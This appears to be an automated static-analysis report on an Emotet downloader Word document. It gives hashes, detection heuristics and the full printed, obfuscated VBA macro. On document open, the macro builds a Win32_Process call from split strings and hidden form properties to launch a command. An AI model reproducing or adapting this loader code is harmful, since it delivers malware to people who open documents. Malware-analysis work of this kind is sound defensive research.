Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fd67e1857d544593…

MALICIOUS

Office (OLE)

186.8 KB Created: 2019-12-16 10:56:00 Authoring application: Microsoft Office Word First seen: 2020-05-14
MD5: 827db45b7294927cb624b3e0a9c55b4f SHA-1: 1bf5aaba94834e8af2731c664ac4248f14325acf SHA-256: fd67e1857d544593af51f51a68a13823223e7eb067b351e9ccaae429862227f1
272 Risk Score

Heuristics 9

  • ClamAV: Doc.Downloader.Emotet-7458509-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7458509-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
    Matched line in script
    Moplwywfs = Join(Split("qwh_h2bdwqwh_h2bdiqwh_h2bdnqwh_h2bdmqwh_h2bdgmqwh_h2bdtsqwh_h2bd:Wqwh_h2bdinqwh_h2bd3qwh_h2bd2_qwh_h2bd", "qwh_h2bd"), "") + Wpcelcnm.Tkeunwzdjusza + "rocess"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set Sjjfkjzcfls = CreateObject(Rbdwrrto)
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set Vbgbcjlczlvy = GetObject(INSN & Moplwywfs)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8224 bytes
SHA-256: 103cc589812bba8725f1d32621b0b7a0c70b003d2aeb5b7f3647bb15e82003c0
Detection
ClamAV: No threats found
Obfuscation or payload: likely
206 of 309 identifiers look randomly generated (e.g. 'qwh_h2bdwqwh_h2bdiqwh_h2bdnqwh_h2bdmqwh_') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Wpcelcnm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Tkeunwzdjusza, 0, 0, MSForms, TextBox"
Private Sub Document_open()
      Dim Vkfpqytfyyrsu
      Dim Yybnowzai
      For Sjfskvhxnyrhb = Csdnbnzqmoun To 0
         Wfmshbyurpprl = xPI
         Jwsugkzgnwkwn = CDbl(3)
         Qacpaunqp = Tan(MyeW5A)
         Ondvdvurouoh = 4 - Wyzwxelkjyp
         Cbwfcynvldrtp = (3 - Vnbtyadvousr)
         Eegnysps = Iqtkvhchcp
         Wvqwyghlkherh = CDbl(6)
         Fqjgdypkih = Tan(Hrkpsphikxbui)
      Next
      Dim Epygvdyqpas
      Dim Viklcxhl
      For Fquwlfizdcy = Csdnbnzqmoun To 0
         Lvmvamrvwabr = xPI
         Hynceiatpbhn = CDbl(3)
         Bpzcxnzqq = Tan(MyeW5A)
         Yetiqsebm = 4 - Patpurfk
         Bkthbzuwtqi = (3 - Gdhlzjclzfaz)
         Ithkfntxuz = Tkesksdfnlm
         Bmbcesicq = CDbl(6)
         Mgczbijh = Tan(Prhhvivtuw)
      Next
      Dim Bntqswtftvfud
      Dim Nndktfjbfq
      For Vzovyivelg = Csdnbnzqmoun To 0
         Jkbpjpgo = xPI
         Dtbvfsslna = CDbl(3)
         Ygfzgmiozg = Tan(MyeW5A)
         Bjdtspkkwlvut = 4 - Dlzsplwm
         Jiugyjwuct = (3 - Ytxpipmklgd)
         Daniofxik = Qexczzrjh
         Fuacgakydfk = CDbl(6)
         Jimnoyfolqzes = Tan(Lotcpqvsil)
      Next
Sjjfkjzcfls
End Sub

Attribute VB_Name = "Xrfpydxbfk"
Attribute VB_Base = "0{E8D6A6C6-2BAF-4D05-B16A-00A79C17EEA2}{A3253E34-5D61-4D49-B0EB-C485ED4777B4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Ueqdsoufggvs"
Function Elbvfewbxtip()
      Dim Yzdqenohomavo
      Dim Iepyxmulumis
      For Vmzarkiv = Csdnbnzqmoun To 0
         Chihsaonym = xPI
         Zqkjenjdvuce = CDbl(3)
         Bvxvmmwc = Tan(MyeW5A)
         Ensuyvuajdm = 4 - Hgumfqhfens
         Qcahvxuueruo = (3 - Abupnrep)
         Zrlojazaveer = Ipovcpzy
         Hdjyfgoanih = CDbl(6)
         Gkesutavic = Tan(Xdjnzsbqv)
      Next
Otuzexnwdaa = Wpcelcnm.Tkeunwzdjusza
      Dim Ojhymdixps
      Dim Gnuzzpljoe
      For Cvjxaxnniyya = Csdnbnzqmoun To 0
         Cwgszqfzzrfq = xPI
         Fjyjypwru = CDbl(3)
         Semeiotwhmodv = Tan(MyeW5A)
         Mcvsrjtjiyzo = 4 - Vlcuvhmsvqc
         Wrqgcedcuvbt = (3 - Vefjaqilblizy)
         Gepfowrrswkz = Paahiroq
         Vmlqfxcg = CDbl(6)
         Orlozcdnmm = Tan(Xklkhspqfqw)
      Next
Fbkkbllyh = Otuzexnwdaa + Xrfpydxbfk.Xqydzwclglloa + Xrfpydxbfk.Auittfls + Xrfpydxbfk.Tbqpogqafxre
      Dim Yuagbzltvajh
      Dim Mizowiiepx
      For Eaxdnthdtkig = Csdnbnzqmoun To 0
         Dkvfcheqzvadx = xPI
         Tfcliulwrn = CDbl(3)
         Cqczsqxf = Tan(MyeW5A)
         Junoobcdjv = 4 - Zeguoeroesmh
         Wvhnzolkwixug = (3 - Oduniqxtybto)
         Qhgmoegww = Ioixwuyhuposu
         Ybjlgadgfa = CDbl(6)
         Rfnsgzozc = Tan(Bhvgnobpmtfgf)
      Next
Wohzgfledt = Fbkkbllyh + Xrfpydxbfk.Scueqyzrze + Xrfpydxbfk.Dakwruximp
      Dim Ixpjzknxpm
      Dim Zohlddmlvy
      For Gzgosznz = Csdnbnzqmoun To 0
         Yfphqoydhiaq = xPI
         Bdwikvqkeocae = CDbl(3)
         Pzdrfqbww = Tan(MyeW5A)
         Mrqlapghnoceo = 4 - Nbaeqkzy
         Xzmizhavmj = (3 - Sontwmrnupvc)
         Vrwnntyccquzn = Icmetimr
         Mgenidkfami = CDbl(6)
         Vfvqlwzwzkklm = Tan(Jqjazzamtounj)
      Next
Elbvfewbxtip = Aqtjfpyvasena + Wohzgfledt + Aqtjfpyvasena
      Dim Xrhcbprq
      Dim Jyfsevqpi
      For Utljxmnqhmqx = Csdnbnzqmoun To 0
         Noeuarvois = xPI
         Hhhyvdtjdxwse = CDbl(3)
         Alssbwgqg = Tan(MyeW5A)
         Iiyfktbzffij = 4 - Dzipslqxmud
         Gbaqblbvlkxmc = (3 - Xzrbbfxwx)
         Adkwdcutuyf = Xqrspldqu
         Mcboujecpnlxk = CDbl(6)
         Usjwgslke = Tan(Ehmyxgsljab)
      Next
End Function
Function Sjjfkjzcfls()
      Dim Xxpjresegnje
      Dim Uxptvvnt
      For Srdvqcclwlbfi = Csdnbnzqmoun To 0
         Izmhowfbb = xPI
         Phavidrrrzbxo = CDbl(3)
         Xinbppbnnw = Tan(MyeW5A)
         Qbmqcqsmvl = 4 - Yorwfhcx
         Zxnzpiot = (3 - Hrapeizgvrpli)
         Byehgudi = Pdcakybz
         Gnbrxhvcmonp = CDbl(6)
         Ojjmgeejnnpfx = Tan(Somgownxmk)
      Next
Moplwywfs = Join(Split("qwh_h2bdwqwh_h2bdiqwh_h2bdnqwh_h2bdmqwh_h2bdgmqwh_h2bdtsqwh_h2bd:Wqwh_h2bdinqwh_h2bd3qwh_h2bd2_qwh_h2bd", "qwh_h2bd"), "") + Wpcelcnm.Tkeunwzdjusza + "rocess"
      Dim Bmcmitvtkrlw
      Dim Jwklhskoevv
      For Pdlwftscylfe = Csdnbnzqmoun To 0
         Tzsdrpfljgqaf = xPI
         Hhqbyfpyufc = CDbl(3)
         Kkegovqols = Tan(MyeW5A)
         Qdtfgenkoreo = 4 - Qdayxoltazbj
         Rzvpmiibwt = (3 - Otwtgqcu)
         Nnuphwcudw = Tpwpcvmo
         Kwarxhslg = CDbl(6)
         Emhuxblzb = Tan(Hkzhwrnhiqf)
      Next
Set Vbgbcjlczlvy = GetObject(INSN & Moplwywfs)
      Dim Cdolanzswn
      Dim Etxcjnatizy
      For Vpsupawpw = Csdnbnzqmoun To 0
         Fftxremlpsirj = xPI
         Vcnddfdfex = CDbl(3)
         Hmkzimaxeuccd = Tan(MyeW5A)
         Vnnxidffub = 4 - Rcaoakge
         Szfjtebzl = (3 - Shrrayubgqx)
         Iuefcrxhnq = Szjaduqtmzv
         Zmmdsovkwazav = CDbl(6)
         Cjeqwdhykacw = Tan(Wjyvicfkevczc)
      Next
Jlpbkzpfo = Moplwywfs + Xrfpydxbfk.Gvdfelhh.ControlTipText + Xrfpydxbfk.Ojywqtmxik.ControlTipText
      Dim Wicddkmosr
      Dim Wcgtdauxechzl
      For Gpdabytlpw = Csdnbnzqmoun To 0
         Ffrwkyvxzbn = xPI
         Azeubcrmz = CDbl(3)
         Oqcbcrqxwmpsm = Tan(MyeW5A)
         Bqtlebetazpro = 4 - Cfzshtvuvhl
         Vlhsoebb = (3 - Bxkwcbmacdg)
         Stycgwydtl = Osxdjsojqyvxx
         Ihimvlboypbv = CDbl(6)
         Kiliyojpxsls = Tan(Tyafneqwkyfm)
      Next
Rbdwrrto = Jlpbkzpfo + Wpcelcnm.Tkeunwzdjusza
      Dim Zefdcpajxyr
      Dim Yzawjryueuwkq
      For Dipnuwqeg = Csdnbnzqmoun To 0
         Hndfcjpfpuy = xPI
         Tfuujismg = CDbl(3)
         Oidrcivui = Tan(MyeW5A)
         Lrzrmvkume = 4 - Uobvuxvea
         Qtgycgzeqpjud = (3 - Wwblfbfbjcam)
         Mojqtixgxhnna = Ltyacazcpovl
         Vbuyhdazejnup = CDbl(6)
         Ysbljyicmywn = Tan(Bywfkbftosqs)
      Next
Set Sjjfkjzcfls = CreateObject(Rbdwrrto)
      Dim Bxgutsihtr
      Dim Mggkcyfliros
      For Cvucehyu = Csdnbnzqmoun To 0
         Wcyntnsaljf = xPI
         Bgkuqbjiod = CDbl(3)
         Mmrnswsbqna = Tan(MyeW5A)
         Rvznghyyjtvt = 4 - Svghzjxha
         Tnmcwngkczf = (3 - Ivqqdtwteozg)
         Aqujuyant = Ngojlimklzdtg
         Etoymwmhf = CDbl(6)
         Plluubeuq = Tan(Ktgmvxgxw)
      Next
Sjjfkjzcfls.XSize = False
      Dim Oehznrqrd
      Dim Qefwcpzeedg
      For Rawltocj = Csdnbnzqmoun To 0
         Ktezmztraqntq = xPI
         Vpwjzchrfhmu = CDbl(3)
         Pphqivdyqnekl = Tan(MyeW5A)
         Oxjrsxyfzztcc = 4 - Zfptkbgdijqx
         Foqbtqkddm = (3 - Jhqosbzynzv)
         Viuahcaywukcb = Gwbcstsym
         Oxawftyfyiq = CDbl(6)
         Kasmnflrsrsry = Tan(Ccjhgqnd)
      Next
Sjjfkjzcfls.YSize = False
      Dim Aybgwpgadsr
      Dim Bvsszuhn
      For Liymejjnt = Csdnbnzqmoun To 0
         Spxbbjnudav = xPI
         Cruohsqbgtqxy = CDbl(3)
         Qufxbkjg = Tan(MyeW5A)
         Ylutrepmykn = 4 - Fadomvhdchld
         Xuotlzxihwip = (3 - Lzrpbazw)
         Wknmweipijrrk = Owwthgxg
         Cpwcivbwswam = CDbl(6)
         Cnsgfiupzn = Tan(Cdqpzdgu)
      Next
Do While Vbgbcjlczlvy.Create(Null & Elbvfewbxtip, Xhghpojzzvolx, Sjjfkjzcfls, Xvfdlnnoqsfoz)
Loop
      Dim Pmwfnzljaouwt
      Dim Xgntzlhginv
      For Eszqdyqlgs = Csdnbnzqmoun To 0
         Heojjacglucvr = xPI
         Igorszbfio = CDbl(3)
         Uueqnhwrgswz = Tan(MyeW5A)
         Uyjqeywlifsb = 4 - Fyguehhlgdonv
         Pjoezfdws = (3 - Vjmzymuzm)
         Cufkirfbqd = Svdxosbco
         Lyzhfctvcydhu = CDbl(6)
         Wmqqtbndtdu = Tan(Glfxsvumj)
      Next
End Function